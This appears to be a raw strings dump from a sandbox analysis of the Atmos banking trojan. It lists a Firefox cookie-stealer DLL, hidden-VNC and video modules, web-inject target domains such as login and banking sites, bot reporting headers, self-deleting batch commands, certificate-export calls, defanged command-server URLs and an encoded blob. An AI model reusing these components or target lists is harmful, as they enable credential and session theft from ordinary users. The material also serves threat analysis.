.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
%System%\regsvr32.exe
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

regsvr32.exe_3264_rwx_01000000_00005000:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration

new.exe_3664:

.text
`.rdata
@.data
a%FnQU
GetProcessHeap
KERNEL32.dll
EnumChildWindows
EnumWindows
USER32.dll
\d.nC
v1%ULRg
]j'
)%uj>_
.io*U
dxKeY
ntdll.dll
setup.dat

regsvr32.exe_3384_rwx_00070000_00047000:

.text
`.data
.reloc
update.exe
config.bin
%0&!%F
?)500>(8
7-52&<&,
,%)4.5(";$2
:'$!71689/
-0=).?,7
60/)4:5<
-*?)2<3:
>5;(4-2>)4 }744
"?5&"5%3%/
398>7="'
;!)5:. =##
Z#%xDVOE
(00(7> <$>59<&=3 =
$6>59$=1
^EXKSQN_^%X Sf
PR_OpenTCPSocket
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.0
hXXps://
GET /favicon.ico HTTP/1.1
HTTP/1.
X-WebKit-CSP
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
X-Type: %s
_getFirefoxCookie
hXXp://
atmos_hvnc.module
atmos_ffcookie.module
atmos_video.module
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
*.facebook.com
*.twitter.com
*.instagram.com
*.booking.com
*.sharepoint.com
*.yahoo.com
login.yahoo.com
*.google.com
accounts.google.com
192.168.*.*
127.0.0.1
*/wp-login.php*
*.xn--p1ai
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
SSSh8
9.tI3
CreatePipe
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
ExitWindowsEx
USER32.dll
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
Secur32.dll
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlW
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
NtQueryKey
ntdll.dll
PSSSSSSh
SSSh4
SUWt^Ht[Ht.Huc
2!242:2?2[2
Chrome
Firefox
nnspr4.dll
nss3.dll
chrome.dll
Process (u minute): %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
kernel32.dll
Global\XXX
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%sd1%
%sd2%
Name: %s
Path: %s
Hash: %s
Time: u.u.u
\StringFileInfo\xx\%s
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Rapport
sXXXX
d*.swf
*.flv
*.png
*.jpg
*.ico
*.gif
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data

regsvr32.exe_3384_rwx_000D0000_000C0000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp4
IWebBrowser2l
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
3,313[3`3
829<9]9~9
=.=3=[=`=
>!>&>7><>
7)707;7@7
= =$=,=_=
?0'101>1
: :&: :}:
?,?;?@?^?
8 8$8(8,808
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1  pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1  qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1  pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO 